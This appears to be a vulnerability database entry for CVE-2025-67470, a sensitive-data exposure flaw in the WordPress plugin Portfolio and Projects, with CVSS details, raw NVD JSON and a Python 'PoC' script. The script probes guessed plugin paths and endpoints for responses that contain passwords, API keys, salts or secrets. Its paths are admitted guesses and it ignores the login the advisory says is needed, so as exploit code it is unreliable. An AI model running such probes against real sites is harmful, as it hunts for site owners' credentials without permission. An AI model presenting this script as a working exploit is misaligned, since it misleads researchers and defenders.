Security Vulnerability Report
中文
CVE-2025-67470 CVSS 4.3 MEDIUM

CVE-2025-67470

Published: 2025-12-09 16:18:23
Last Modified: 2026-04-15 00:35:42

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Essential Plugin Portfolio and Projects portfolio-and-projects allows Retrieve Embedded Sensitive Data.This issue affects Portfolio and Projects: from n/a through <= 1.5.5.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Portfolio and Projects插件 <= 1.5.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67470 PoC - WordPress Portfolio and Projects Sensitive Information Disclosure # Target: WordPress site with Portfolio and Projects plugin <= 1.5.5 import requests import sys def check_vulnerability(target_url): """Check if target is vulnerable to CVE-2025-67470""" # Common paths that might expose sensitive information potential_paths = [ '/wp-content/plugins/portfolio-and-projects/config.json', '/wp-content/plugins/portfolio-and-projects/includes/config.php', '/wp-content/plugins/portfolio-and-projects/assets/data/settings.json', '/wp-admin/admin-ajax.php?action=pp_get_config', '/wp-json/portfolio/v1/config' ] print(f"[*] Testing target: {target_url}") print(f"[*] Vulnerability: CVE-2025-67470 - Sensitive Information Disclosure") print("-" * 60) for path in potential_paths: url = target_url.rstrip('/') + path try: response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: content = response.text # Check for sensitive keywords sensitive_keywords = ['password', 'api_key', 'secret', 'db_', 'salt', 'credential'] found_keywords = [kw for kw in sensitive_keywords if kw.lower() in content.lower()] if found_keywords: print(f"[+] POTENTIAL VULNERABILITY FOUND!") print(f"[+] URL: {url}") print(f"[+] Sensitive keywords detected: {found_keywords}") print(f"[+] Response length: {len(content)} bytes") print("-" * 60) return True except requests.RequestException as e: print(f"[-] Error testing {url}: {e}") print("[-] No obvious vulnerability indicators found") print("[*] Manual verification recommended") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-67470.py <target_url>") print("Example: python cve-2025-67470.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67470", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:23.270", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Essential Plugin Portfolio and Projects portfolio-and-projects allows Retrieve Embedded Sensitive Data.This issue affects Portfolio and Projects: from n/a through <= 1.5.5."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/portfolio-and-projects/vulnerability/wordpress-portfolio-and-projects-plugin-1-5-5-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}